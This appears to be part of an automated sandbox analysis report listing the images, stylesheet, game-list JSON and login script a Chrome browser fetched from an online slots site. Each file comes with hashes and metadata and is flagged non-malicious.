                                                      Preview:.PNG........IHDR...............^.....gAMA......a.....sRGB.........PLTE...U....u...p..+.....g.....^.......4 ...."......|..3.....&.......7..h.....V...9............w...a.... .........,.....Q......i...E.....4................s.........E.L............p....../D...N...&...~"...:..I..G..........,..A....R...i.....!....]..u$......7B.....}1..R..\........O..|...0.^.k ..:...E.r...>.o..i...........9..a......W....8..E..)..o.........L._..8..d.._.....T...)3...|..q../._...}..+..].........g...J...D...."....#.......]\.4..H.....8..Q..X.....R......2.omS ..H..D.i84...o1..{.A0......r.W..U..JI...m.....j..y...}....B.....*...,-%............~...X.G.K5...+qK..d+;..vzK...ZM.]0..31..*......64....^..&#.x..`^.$.......??cTJ.r@.tr.......YX....:9.SP...).HB..F..*."..8......dc..>..5....&.;..a..D...K(....H...}.e....k=ws(.[....|w..M..N.......s}'...2... .IDATx..{T.....HM|.Pv.Qr.....BlHI.*H69...mB.......$;r.pW..6...T...:R)....O;.z..u..z.N...N........g...|...{...1$.|_..s}..T*U.2.mNNNV.....B..7j...Fmm..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):28798
                                                      Entropy (8bit):7.986337296568113
                                                      Encrypted:false
                                                      SSDEEP:768:z4AvzLY3b0xh8bNKYXDlF3/N45Yu1oPWM8P:zRYL0owADltSoPC
                                                      MD5:04AAAD6EE31D0BDB668C2210AFF038A1
                                                      SHA1:FD111FBB1F7DE4F726CD2EDB40D24B42F3CF91BF
                                                      SHA-256:70D811FE3C4FD1B7D7429B4290E5FA26509DCB35A54F0C84AD20135273523EFC
                                                      SHA-512:4EAB155DC078519778C79F97222C9223A9CAD58CE29C2B6F03B5316FE01696B889240B58123F3244B10AFC9E600823A8BCA73A6FB52D6DDE716F7138F72BEE45
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............^.....PLTE....">.3_.;i.#7.,Y.Br.M{.1h.U..&N.G.. ..&...3...*A.]..S..c..g.L...5t....N.Y-......3!h.nK..]4.?..4.......]..........w..O)..$..,.x.5|.7..'.1.......k.....~.k>,l...8h6..U..)...........(.9......*2..c.....q$t.<.3..r..]...J..Mh..H).....va.......?.'...9...wIc.......2..1=.E[m......E..-b..o.9.... .........G..{..r.Z..V.\.XF.......yb....9....%*tJ...J.L...Y...2..[.."Jo.w+...P.D0......B.D22:..1y`.v..\......./..o...x.OU..c...._?....b.@. @c.#]..E.='.p..P.[5L;5.h..gV!5QI|.0RxuyD.........Wk.iJ-.......Z1..:t..F..D.y....k..g|.1q.z...t?.{o.}a.....9K\....8.h..oO.........?..a]U&]..s...jQ.u..@...o.c....n...g...n......,L........f......3.......Q.P#.o...K......6....+.k.=U........^..2pEE....g.:.x.f..8...F.k..StjN...........-...h..9...p...Q.....m9IDATx.|.oh.e..{w.?...g.y..g65.D=..f.."d/...V...T...a.......X.{qt..eV..lc..-..&. .....EeXf..@_....%i..=w...=.....<....|>?...+.t>.9I...$.U<.;.o"..h....y...T.I."g..q..?.i....2<.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 80 x 19, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):690
                                                      Entropy (8bit):7.153945654594249
                                                      Encrypted:false
                                                      SSDEEP:12:6v/77ne32K2dfvHEj9Gx1QrW3Bil00ANCTUe1sIlUEjeSWsK5mPMgBBwy:4vK6Hkj9WQrsBih4mvmEjeFwL3wy
                                                      MD5:B30EA49A2BCC7479A195BB1FC07BD031
                                                      SHA1:A7BBE06838B85840035172FA9A8EE6BD35C1C636
                                                      SHA-256:08F3D508861FBB6E144807AF6719EA78CF9C26E3C99A1CBD12F9D83FE9F0758E
                                                      SHA-512:AC7F880C76EB7E3701046FC891BB9ACC2540548431EFF4552C3639DCC08B146F3FF973D050625EDFBBE61407C36E36F03080D7380B4CC4CECE176EA7CDFC4C3A
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/footer/footer-logo.png?ver=1606790107
                                                      Preview:.PNG........IHDR...P.........0.z]...TPLTE.....................................................................................p@.....tRNS..J>&...b.s...kU....17..{.........IDAT8.... .D..DAP.w..?.HTN..../.\V%.....)....@.Z....i:N...<.v:.4..[...?]..u.[...t....../. ..d...e|...>f\..mY....3...C...Ua.rv.B...ss4..]Y.....wwe..1(%..$...2..;..m....h..[.......R..c<FQ%.Z+*8.7tm......5..).......zoA.J......K*_..\.....V..U......T.l....G...%1k9.K../.;......|....-...J....;....{%........t./@.).7M..{Mk^.....]iyUI.B.Z0..$.HI.u.CY3...m4.a.y.\......v..b{.u.;.a:z....?....X....b.f|..h.1!...i~..\..X..Q..g...Gy.8S.C#...>G...ev.Pd..{.$..Fq...2..T.B%.4.d.f4.>Z_..[.z../.....".....IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 853 x 25, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):1501
                                                      Entropy (8bit):7.602950212155415
                                                      Encrypted:false
                                                      SSDEEP:24:L6w8heMEBxrpfGXK+kkdoEh6+A+C43pYWAZl31Z6Nm8usP2agy0chcldp4H6llL8:LRDJGX0eokAnIfAD31HsPf7GrkCdm
                                                      MD5:3E635F694740916061BC36DDB7C1E1E1
                                                      SHA1:EF9D74E0CBC93BA872891BE65D08FFB9A29428DA
                                                      SHA-256:36F9BBB9A378BBE15D3D1BEEADE4B3F2C32BFD166EA073FFE3C29DEADD3DC0A2
                                                      SHA-512:C6706B7B48E71436C8ECE241C22819F5E243B285BF74F3CE2A6DF00166ACEA6664D048B8AAC5BD6F27B0F96E9A039160695D03090B670B2275051BFACE6B8397
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...U..........S.~....gAMA......a.....sRGB........uPLTE......................................................................................................................B/....&tRNS....@.Po/...`.f... .U...[G...t.(.z8<...>....IDATx..z.0.F.lA.eW....?.M..@".[.M.....d.$3..!.N.../.c4i..Q.A%...~..&W..S.7.[y..*%Udhy.....Ci.p+..E.".*S...<.C>..,Q........7..B:2`V.c.J.i..=....;.UC.h~..1.o.gK.h.(U.{7/H+'.Pm..pK;IT..D_...l...X0*.R8..".rD{.......Ri.Z...!.*."..@.<UVg....^M..g..|{.....`..N..B........*g.+..V...>9.BEj]..xd.*T.o..w.W.H..U.....XUT-......U.G....l9>10..z.v..T.o....$R......L6...o..G..19l9..\..Q.x..{../.:.O...B.XVT.$q.!m.W`F....z..}..E. ..... .v....>b)..G....w...u........o..*..w..U.).:>....F..v&...s..1..X..p.9..T=......T........9.....CUw..D...d...s.j.{N..&9!U.q0.*..U.>U.{.]..#"IN....#3T.`....|........].E ../..qt....(Wf/U]b~%U.y.K...P.<#K1d..0M..i.....T.,..U...*. IT.y.i.........!.......%..1.F3..IP.6P.W.$.4.o...)..N..*..P..d*.i..P...,@.\..T.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):17139
                                                      Entropy (8bit):7.9574034795359445
                                                      Encrypted:false
                                                      SSDEEP:384:830nhpgegUtCLtL2IAjB/qS0diNcq1eCVL9XEav1XvJ:CqhTgVF2IAjwJENT1/VSadh
                                                      MD5:9FE6F2BA9E6A4062DEB9D44E482CF5B2
                                                      SHA1:D1ED508EBFD41BAC6EA6C96730F3F1E9A34EE075
                                                      SHA-256:1B304F462F0930A952DC84FEED2D43C6D7294E11CCA80126AFF6EF1E52E404D8
                                                      SHA-512:3CF95ED7456A241D7D1B4CCEBF171BEB8B68C7AF4DAB5D1CABE3E7D7B01CB7A078CE2F6029E0A05F7205B1DF9EFCC3CB65F7E698C8557CD391902FA6A96D760E
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............^.....PLTE..2..4..2..4).6<.6A.63.7S.>u.Dj.Ac#K...'}HD.PX.ar.6..@..J..^..p...........s.~j............w|jVbUH@TB?66??.;K%%?.,1....(..;..C,.P7.ZB.eH.oQ.|W&.a..m1.r;..E..K..R.X._.i..v.f..g..Y..H..y..U..n..~..n..\..................................~..~..u..m..f..U.K..V..C..B..>..5..1..B..B..;..-..-.v'.h .V..B..N..V6.|?.uI.ZJ.g_.~o.C).i..`..k..7h.<Q.15." ......t..[..D.&Y.;n.J~.U. Z.$d.%p.)|.0../..8..8..>..>..:..K..Y..1~d.gR.q........xw.cq.SW.Qo.Ga"7Y...J..m..h..c..\..V..P..J..E{.@_.?<.0,.(O.9g.Hp.Nx.RP..y......B..].L..U...........d0.Z"._&..[...!..-.:.../..+..+.. .F..9.. .z..l!.X%.K.y?.l6.a-.X#.M..p(.>..0#.D8.xD.G,....-.{ .eK.j}.{...~.^:..9..< .?#.A-.W@.>;.5).3;.>c.Hz.<..a..i..Z.|Avl*`_.HU..F..>..>(+G/@PGPfVb.w.bXvJ20t&#`.'X.+]..@..M..R..G..;..7..4,.$C..?.IDATx..{.\U........;W.. ..^..D ...x.=......#.B.........9......\."..3..3........I..r..\.$.......^...]U.i$.s>.t...Oz}...]{..[..a..-s1...B.f..n.....P...A.{P.....X........8.t
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):26129
                                                      Entropy (8bit):7.984882668407912
                                                      Encrypted:false
                                                      SSDEEP:384:HNfG22cluZl8PUp7PjhYwb3V1pV1WpcP762DSNPBgpVO3b0BijFsasOThOv:t12o0PFYOT7opc22WpeVO3FRZ9Ov
                                                      MD5:326A5A8BB65826085454F82766B6E2FF
                                                      SHA1:3F5CFED438F8F306D62EF4C5FF22692A2466A3B3
                                                      SHA-256:780365E932E7575E4C5E4345BFB90A4909830347012E9626F2CB2BEF537EA7D1
                                                      SHA-512:7FC8493260CAEAC8BEAE298D2DAF7A0022EBA9FECF95E0F5066099C3BBDFCEBD4B4C3C7290914DADCA11327122A9A986CA3443741FA1550210A82627D46783D7
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/joker/ao6qfxp1sqamn.png?ver=1722582213
                                                      Preview:.PNG........IHDR...............^.....gAMA......a.....sRGB.........PLTE...........0....:;.............%X.CK>4....3....A5*.N.N.<......R*..B.......8.....".........UH?...?.6..M.........&....d.K.....{.......$.........Y..o......(d..t.U..r.A$.......)k.1&.!#..&..u.2+....5....s...._....;........-,....A...k......f.%......L?........\.Z.......bRR....k.....&................B.....-..........|...S.7...../.........{$.[p..C-.-.h............D....*..g...!....?.....^..}.+.y...U.......wS....F.t...h.s..+.s^+..L....W.....?...O.O....`)...D=O...Jd.B..@9.D..b....z....aN.....y..Uc....&....i..+.M.nT.x..q......c:C...<>.Q;...4.F.'a.9......d.VH...5y.X....Y].......9..E.g~.t7,"..wgoy{RizjX..42._.Eb..9.i~.D>.....zk...Tk..........U.....v;C.oo0(.p}.r...{r.5...sD|.j..\=..h..k.v...K.d.a.,..s..@.G... .IDATx...@SW..i.h.5...$pb$.@JR.L.Ec..$*8 .G.Z...%<B.PD.L..i.P.G.... ..C)..`...X.C..k}.:..v..}k..:=s...;..o...Z;{om..E..%....#..P.-....S..v*4..S..<'..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:assembler source, Unicode text, UTF-8 text
                                                      Category:downloaded
                                                      Size (bytes):38713
                                                      Entropy (8bit):5.135402496692383
                                                      Encrypted:false
                                                      SSDEEP:768:GZ8o1jMCFR8FLFiFUFjUIFolFj/EF2FXM7FbvzFLGFtkF9+t2vhPQsphJ87bWFOs:mjMC789Ay5UIal+MFM7tvzcrkzi25PQ+
                                                      MD5:1F956BAB07D9367ABBE5A92FA89AF02D
                                                      SHA1:38CED9491BB70C24CFB99A367109AFEB2443EAAD
                                                      SHA-256:66526555D1F55BFBAF7ED1A36C90E6DB2EDAACF9363974834264B2D6942E559E
                                                      SHA-512:439F68F04A541EBC58FBA9BFA33A13024548EE6D14FBEA3E8CF3F49B72B350409C665AEDB6AB0051305F218F58777699F9F183B32BCB6A547AC0A36E01C44B51
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/plus/css/unite/egame_unite.css?ver=1658200755
                                                      Preview:@charset "utf-8";./*loading*/..no_search{. padding: 20px 0;. font-size: 26px;.}.#game_list{. min-height: 500px;. position: relative;. overflow-x: hidden;.}.@-webkit-keyframes rotate_pacman_half_up {. 0% {. -webkit-transform: rotate(270deg);. transform: rotate(270deg); }. 50% {. -webkit-transform: rotate(360deg);. transform: rotate(360deg); }. 100% {. -webkit-transform: rotate(270deg);. transform: rotate(270deg); } }..@keyframes rotate_pacman_half_up {. 0% {. -webkit-transform: rotate(270deg);. transform: rotate(270deg); }. 50% {. -webkit-transform: rotate(360deg);. transform: rotate(360deg); }. 100% {. -webkit-transform: rotate(270deg);. transform: rotate(270deg); } }.@-webkit-keyframes rotate_pacman_half_down {. 0% {. -webkit-transform: rotate(90deg);. transform: rotate(90deg); }. 50% {. -webkit-transform: rotate(0deg);. transform: rotate(0deg); }. 10
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):2370
                                                      Entropy (8bit):7.837265989824533
                                                      Encrypted:false
                                                      SSDEEP:48:afBvHW/C24jL8KNMyUeQXRYMh4eeD+54TvcwmWTvtnnneQ:a5uq24jrU2MhqDAKvbxeQ
                                                      MD5:BB9BBCCD34B30D852118928C268B0026
                                                      SHA1:C463B84E8722A3512B60A0368A05ABF0ED890781
                                                      SHA-256:12067FF552E31375CEE21F6331E001A696A2570C65D35452B91A1C894A110A33
                                                      SHA-512:4A7604EF0428887F7CAEE4447A587CDB3665D73799E5B298C97C4986EC3C6C6EABFF5F7A463A3FDEC49F42AE71BE378383D7576743A80C90906F67F5876FA25B
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR..............P.....3PLTE...5<z5<z5<z5<z5<z5<z5<z5<z5<z5<z5<z5<z5<z5<z5<z5<z...@....tRNS.@.... .`.P.0.p.".V....IDATx..............................={.m.....n.,......eNi+..V...........0..0..0...e.*k...1.....L...i.c.Vp4.0......'..).M...o".4.LK...ET.{f.2......^.X.z.(-.?..y<...2.z.7..{88..x&T..t..0..#K...\.L....?..G(....al.....Ud.H.}...a..)..C^..c^.?.......'..........w.?C./.qdY.^T.L~..0..+.)N<,..a\..5......3....8|........&...m.....@.....v.P..y2.`..4......0.Ofv.o.;.6k....GO8K....Ar!K...m.&..Z..y.vHhS1...K..0..>...R~.....y.|..V0..XR...m{.(....QO...,....0....).....f0v=...*vTGw..m.s...r4....^c.:.V06..m.cM.....0...YO~..4%#.r.2....L.....V.g..MF.S^...x.i..N2...jMV.....`.s.......%...JfvD.S.....,~..R~'.J$.k.gtC.P.ej..&+0U..e.A.-m.]8z<IN..K.........*0%.ze.M/5)..jn`........R=._..r. ...G....?m..L...Y.^.4.u2.....aEf.\......'f'V..fwH.....A-"..H.....Ay.`.,0|{.....fGBf8...aA.....f....0%!..=%....{.:...]/7..35%.o.1t.\S`&V}..[..'O..V.ih....;.f..JI8.f
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:GIF image data, version 89a, 21 x 12
                                                      Category:dropped
                                                      Size (bytes):1388
                                                      Entropy (8bit):6.766611588629613
                                                      Encrypted:false
                                                      SSDEEP:24:tal1hiyWwylZ82lYSqMHidSVRdT3LyJ3VazNGY8UPKNwNb:GuinNui0tSJ3AzNL8U3
                                                      MD5:E5F49D4212FEC35B11B76CD616E1F8EC
                                                      SHA1:0697A3B11F5D0906B2D1CF59051B46EE3B5DC72A
                                                      SHA-256:C34ED994680CA6446B85DD47AA963CD4CFDD07180A9517B4D7D37F3C7A1B94CD
                                                      SHA-512:A7057E7E9CD4FEC2CA911AC507CE7161412F8813453CEB3F2A1D28380FDAADF1E8D5119EAE83F92AE001CA7F8A2CF0F0C0369A8EF2AF4D751B6A08053C3EFC94
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:GIF89a...............................!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocumentID="uuid:4833F52483F5E51192B088786DF45048" xmpMM:DocumentID="xmp.did:466D01A3F7E511E5BFAFB9E2AB111114" xmpMM:InstanceID="xmp.iid:466D01A2F7E511E5BFAFB9E2AB111114" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:c312321d-3225-4f4d-873c-4a3adb717043" stRef:documentID="uuid:4833F52483F5E51192B088786DF45048"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JSON data
                                                      Category:downloaded
                                                      Size (bytes):3511
                                                      Entropy (8bit):5.11085126261572
                                                      Encrypted:false
                                                      SSDEEP:96:/bcvlvUfvW4BvkvvgvZvQtvQHvWvkvKvhvrxBrj:/Ivlv4v5BvkvvgvZvEvsvWvkvKv5Hv
                                                      MD5:376BF7683AA9E5C1391CC2BAF715B5EB
                                                      SHA1:C06C4A70A2C16D469D893D204E5CBC3E9BC3CC27
                                                      SHA-256:FEAAAA45B8BB54B58773CE586CAEC64F5F10CA25AE1DE10BA9A5E322E498D2C5
                                                      SHA-512:57C1ACDC2C4CB5C7FA0A112F995FFCF07C56596BEB9ABBAB2BD2A75D3543ED046981847EE4DDB1381B292DDDA42BF880B450502BDA265EA32A69F75DD9614B7A
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://b45032.com/getegame?platform%5B%5D=202&page=1&cates%5B%5D=801&gamename=&gameid=
                                                      Preview:{"gamelist":{"current_page":1,"data":[{"id":31356,"name":"Sizzling Hot","pfid":202,"ppname":"Joker Slots","code":"JOKER","img":"\/\/5getfab.segrft.com\/common\/storage\/game\/egame\/joker\/ww3a8wsu4de7c.png?ver=1673334591","progressive":null,"ppid":202,"notry":0,"favorite":false},{"id":31360,"name":"Hot Fruits","pfid":202,"ppname":"Joker Slots","code":"JOKER","img":"\/\/5getfab.segrft.com\/common\/storage\/game\/egame\/joker\/soojfuqnaxycn.png?ver=1673334591","progressive":null,"ppid":202,"notry":0,"favorite":false},{"id":31357,"name":"Dragon Power Flame","pfid":202,"ppname":"Joker Slots","code":"JOKER","img":"\/\/5getfab.segrft.com\/common\/storage\/game\/egame\/joker\/3yfmucpss64mk.png?ver=1673334590","progressive":null,"ppid":202,"notry":0,"favorite":false},{"id":31359,"name":"Burning Pearl Bingo","pfid":202,"ppname":"Joker Slots","code":"JOKER","img":"\/\/5getfab.segrft.com\/common\/storage\/game\/egame\/joker\/tocki7xk7xwq1.png?ver=1673334591","progressive":null,"ppid":202,"notry"
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):28355
                                                      Entropy (8bit):7.991912457271621
                                                      Encrypted:true
                                                      SSDEEP:768:q1TR5OsPOXsw7rH9YfYEGau/MI7kB+qvU/YH6Sidq:63OUqrdYzGauqBLQg
                                                      MD5:8554AF4EACA5E9E80520C0C17CDD1BAA
                                                      SHA1:12D392083EB331C0D05BFDB7E8634818C4151D1A
                                                      SHA-256:C7433DF2BD389DB5F0842F4128B108DFD11A273D0D8A004D1CA9FAB225029339
                                                      SHA-512:6CAA9E5253CDBE4D88B6DA3234D65EE20D10E70EE3D4272CC9D53047286ABF01A80E59AD5010F7D917CD41ED47CBE402A6D46653F1D3763A178FB8213EF0D4D2
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............^.....PLTE........T..]..i!.o..L%.y..B!._......-...u......................X.DtK.........s..B.&.....@AC...v4...r...-0..............................-........B.....0.k7$..RU..R?.9.3.o.;..=...f<.....b....d..........Z..f....O.f.8.D$..k._......7..Uk.MW.(....:......A...K4.B....F.....j.o..............5.....r... ..b(...._e......}.K.....E...$]!L..9I..u.(;l.,.....'..K!.W../...'x......c.6...{.QjDQ...n...Q.hk*...=.......`.c?......{.^.w..x.S...X8.s..&&.<.....m{..J.iB.*W.......>..H.. ..Ch.T%..tTh.phgX'.a..c......eCn....k.Q...m6....nd..`..Y+..R...B......Q..._......,dVu=.D....XV..-._..D.c.[.X....".....BI.....Z=Nb+.e.i.y.........d..r.<c.m.p.......=.|....}8..u..R..7..;..G&./dg.4...p.....^..z....-..gl....p..0.........2v.T..c....e...<..W_.8..............gx..k~IDATx...{ .i..?..[M..3.iv.S..E..a.jf(...YjQ.-.:.Y.KD.!.Y.....tZ$...].T:.m{..^.{..}.~.}..{.s=...t]...8.b..}1Us...N7.B;qnM..5k...[.h.)i.L..7S.u.np......i.[>.v..G../...G....'?.U.|
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):3961
                                                      Entropy (8bit):7.77018806812612
                                                      Encrypted:false
                                                      SSDEEP:96:3Xw9lXDi8Y6cAmmwh/7cmF/8IPFQT+5lZ:wXDi8ncAmmwpQmHD
                                                      MD5:FCF051655A112FDFE68F5732890C57DB
                                                      SHA1:BF68427B04854B04838D7FC222D17FD2937D3A15
                                                      SHA-256:3B458237274D63ECE50DD3CE3305D4D85BA388D165DD343D583428D15FC1E04D
                                                      SHA-512:56ECDDF3A36E48966286CEF9FC3E1E1BEEA7470397C7DE6CB53C173A250BD14E5916EBF8AA05FF72E8DA7F266AE30FB592E0EB44C44BCD094DB3C85BC7F75FCB
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/egame/nav/185_egame_logo.png?ver=1638670083
                                                      Preview:.PNG........IHDR..............P......PLTE...O...........[.+......[.+I.?".......................?........F..N..p.!......o. L..p. p. O..p.!...p.!p.!p.!o. s.#...J.....P..;..r."l..q.!......N..P..p.!p.!p. p.!p.!l.....F..O.._...........Z.+...T..Z...........q."n..P..h..V..=.....U.....`..h..R..d..^..X..\.....p.!...p.!p.!q.#p.!p.!p.!p.!p.!p.!...p.!p.!p.!p.!p.!...m..r.!k.#..._.(.........Q.....B.....1..*.......}..cf.%.................@......b.'p.!...p.!.........k..h.%...j..].*|.5b..]..#..i..n..e..O..y./U....Jp.!p.!p.!p.!p.!m..p.!p.!p.!p.!......p.!...].*..d...t.(f.&......].)b.'..Cg.'..p..Ra..T..k.$i.$B..............p.!......E..y./..NZ.+......j.#m.#...E.<.....wc.'..S.........a..T..... .....G..F.....O..p.![.+......R..>...........^.,q.!w.#z.$M..s.$r.!Z.+u."Z.+o.....[.+v."r."...m........q. j.....=........h..r....tRNS..............l.... ....=........8................Q.............oK........................x][FA.($.......$...........~tQ2*.....jC.......................vsnIF8......................
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 15 x 16, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):582
                                                      Entropy (8bit):7.383404335375549
                                                      Encrypted:false
                                                      SSDEEP:12:6v/7rOaiVFgiyBtzWcMEnDCcKg3mmCb24KBG5Dd+UcgrFnEt8Qf2aqc:QO4VBtzaEDSmc242G5Dd+Uz04a9
                                                      MD5:D66100DC3B6143CCAAB68587EDF59169
                                                      SHA1:AEC841ED002D6F0572B1BC380212D38BE5858728
                                                      SHA-256:CBA9DFE544DF0C8B71BB9881E1D77B9BE08007DF320ACFB8398C9B636BC1AFC5
                                                      SHA-512:A5DB92A6BB8E2BED2268BA81EBCFBFF6564EE50D09ED94C2302CBAFB4E234CF9ACC99D585568ADB0DE318E38E790467CF81FCB05643338C7200277A878D04D73
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/header/common/kefu_icon.png
                                                      Preview:.PNG........IHDR................6...DPLTE...@*.M;.oc3fT"]>.gD..j......................................H.#9........Q3.:..............................................................................................vx............~..x..l.zk.ae..^.hWW\V.uU.fTx_KDeJKaJ..H}fFgM<=/<.!.\D,.+..&V2....G/.>%.<".... ........&(..].pT..../../..... ....P.....tRNS.........&.....IDAT..E....Q...G..d.m...}.:....JE.._g....Y.+..W.Z...o.sy:>|.#.....D(.i.o[.D.?N.c.:..".[M..."C1.......).PV....w...5.eY..H...#.4o.I].>.)8..X..d!m.q... ...hO.J.,...7.J1.~.....IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text
                                                      Category:dropped
                                                      Size (bytes):11516
                                                      Entropy (8bit):4.191865841156002
                                                      Encrypted:false
                                                      SSDEEP:192:gxlzn1ISS/yakFAn1hQu66H1Ka1t4l/O3a6Nr:Pcu6IQM
                                                      MD5:2C96D80D1A2FE2DA79B651FAF7CC7A61
                                                      SHA1:485EC6F90E4BBFEB5367ABBEEF8532C3D38929C4
                                                      SHA-256:F5A6748DC5B42148F41FDC03097644A19E8764B339C9E003BDF7D4820EB8A7EC
                                                      SHA-512:1C464550458CFDE52E6E47D5613BBB229FE3F0A483BBCC22CE180EFC00977E0F7DFA737C4D657B529013E78995DB0E8FE2B2D287935A2E2F2A05FDE15925F6D5
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:(function($){. let logoutlock = false;. $(document).on('submit','form[action="/login_action"]:not(.hide)',function(evt){. .evt.preventDefault();. .if($(this).data('isSubmit')){. ..return false;. .}. .var d = new Date(), validcode = Math.round(Math.random()*10000000), _self = this, callee = arguments.callee, errormsg = '';. .d.setTime(d.getTime() + 1E4);. .var str = "boscookietest="+validcode;. .var domain = location.host.split(':')[0];. .document.cookie = str+'; expires='+d.toGMTString()+'; domain='+domain+'; path=/';. .var regex = new RegExp(str). .if(!regex.test(document.cookie)){. var msg = trans.common.cookieClear;. if('swal' in window){. swal({. title: __('loginTrans.error'),. html:true,. text: msg,. type:'error'. });. }else alert(msg);. ..return false;. .}.. .d.setTime(d.getTime() - 1E4);. .do
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):1805
                                                      Entropy (8bit):7.52113263704263
                                                      Encrypted:false
                                                      SSDEEP:48:HBj/CMts1+vpiymKbI984gxKy1ljvs/d+ZSytq:l/2MiyZM98hKUjE/dNmq
                                                      MD5:1E1D769E827DC5105B8BDC6F0492AD18
                                                      SHA1:DD3E459A39B9872552CB6B6FBFF89E59AE7C53DD
                                                      SHA-256:3C783B8B36FEC7029E650B98568ABC47B2AF9C82E098E75C3E019AC8EB042B43
                                                      SHA-512:35C7D8304102CD82015CB7CD8CDE65DA42F9B17070A1105EAD56801C3F743B1EAE3EF6C47C093799A8645C0CABC81064D2236DBB0F8E53D7CF0B52AC02AD2524
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR..............P......PLTE...."&.)-.&*.'+.#'.%).%)."&.$(.$(.$(.%).%).$(.(,."&.(,.&*.$(."&.(,.(,.(,.$(."&.%).(,.'+."&.&*.%).#'.&*."&.#'.(,.'+.$(.&*.)-.&*.%)..-...."tRNS.@@@.....` ...... ...`....0..p0P.Bi.....IDATx..............................=8........m.UUUUUUU..[j...0.@.@i..Q.Z..../P..P.[7..{.d.|...a[.s...8!....^:......K..y.....GO....u....[M..~w@4.7.f|a......C...).@D..-..L|a0.q.:L..`..3..'..1..H....r\0.:.{ .3....aV.0.1.&.A.........e.,A..%B.\.0..H.0..L!......c.0W....!..|a..`.0F........E..0a.A..J.0...P..{&..Ua2..<.`...5.f..0U,..[..=.....2L.B.....`X0.(..X..[_..3..L..0..aV..r29.&........b2...,a....0.....4.L...06.....&n..Ia..k.0..9.4g..`R!..<a..D..3..`...@...Lf.Y.`0..&.`.Nw..0...k....9-.....V..JU...........Q.y<a.O.jp...h0.%....S...`......=a........f.D.l=aj.n0.......0C>..$........fp.Y`d..... 0vl.A.a......0....~....fPT..?L...TT...a.z.0CB.Q.0...9Ra..9`.0....0.T`j*...0.L.f0T..0.$...0H.`.L.f0T....)..T..`....`.0......`....x`2L..+.....s..`....8`..`.2*.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:GIF image data, version 89a, 21 x 12
                                                      Category:downloaded
                                                      Size (bytes):1251
                                                      Entropy (8bit):6.823158450416459
                                                      Encrypted:false
                                                      SSDEEP:24:tal1hfvWwjx82lY2T3JVl9yJ3VD60GY8vk2n:GANn2NIJ3jL8L
                                                      MD5:25F6274AA9E9E073709978B30CF559C4
                                                      SHA1:A7CBD2BFCC634F40DF01E0195E2CD666A22A7291
                                                      SHA-256:243406DC9776577510746308A2816DB585B4ABD09A64E1C761654316C0D9038C
